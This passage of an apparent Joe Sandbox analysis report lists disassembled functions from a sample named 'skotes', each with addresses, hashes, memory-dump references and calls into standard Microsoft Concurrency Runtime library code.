                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1091748018-0
                                                                                                                                              • Opcode ID: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
                                                                                                                                              • Instruction ID: de4f072aaf1dca0b17399bd929b16a9a875841cf6160958f8114d71bd43867b1
                                                                                                                                              • Opcode Fuzzy Hash: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
                                                                                                                                              • Instruction Fuzzy Hash: 84412774B04220ABCF199B25D895BAEBB75AF45310F40409FE5065B3C2CB78AD45C7D9
                                                                                                                                              Function 004256AF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 004256F2
                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 00425726
                                                                                                                                              • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 0042578B
                                                                                                                                              • SafeRWList.LIBCONCRT ref: 0042579A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 893951542-0
                                                                                                                                              • Opcode ID: a96c0715c63f9ea40c30877f16458aff8a3b90ae0bdce9f16fa17b481edfa4e9
                                                                                                                                              • Instruction ID: 2ace6f4a40c08d74c4d6c1ca825f031ea8b8404ac3105886002eae4958e0fc28
                                                                                                                                              • Opcode Fuzzy Hash: a96c0715c63f9ea40c30877f16458aff8a3b90ae0bdce9f16fa17b481edfa4e9
                                                                                                                                              • Instruction Fuzzy Hash: CC314836B406209FCF059F20D881EAE77A6AFC8714F5441BEE9099B395DF34AC048794
                                                                                                                                              Function 00422CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422D0F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3433162309-0
                                                                                                                                              • Opcode ID: 18672f31b438cb1fbdf8a43f64e6892a6ba09f096413504940c645fb7ea15f7f
                                                                                                                                              • Instruction ID: d418521b68a385beeb000fecb389156560c70f9a2eedc7cbe4bb4063ba4b2acd
                                                                                                                                              • Opcode Fuzzy Hash: 18672f31b438cb1fbdf8a43f64e6892a6ba09f096413504940c645fb7ea15f7f
                                                                                                                                              • Instruction Fuzzy Hash: 56318835A00319EFCF10DF94DA80BAE7BB9BF44304F5000AAD901AB346D7B4A905CBA5
                                                                                                                                              Function 004313F5 Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 004313FC
                                                                                                                                              • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00431447
                                                                                                                                              • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 0043147A
                                                                                                                                              • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 0043152A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2092016602-0
                                                                                                                                              • Opcode ID: 2239aa853bfecadff8e07fa5e1a1078e488f64c7c49d1569009b16c376a0dbc7
                                                                                                                                              • Instruction ID: 2c1c6394bad657f7c7461a769e5481a7fca310a92004f219b2be54b756da1658
                                                                                                                                              • Opcode Fuzzy Hash: 2239aa853bfecadff8e07fa5e1a1078e488f64c7c49d1569009b16c376a0dbc7
                                                                                                                                              • Instruction Fuzzy Hash: C431A3B1E006159BCF04DFA9C4919EEFBB1BF48714F54922EE416A7391CB38AD41CB98
                                                                                                                                              Function 0041BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
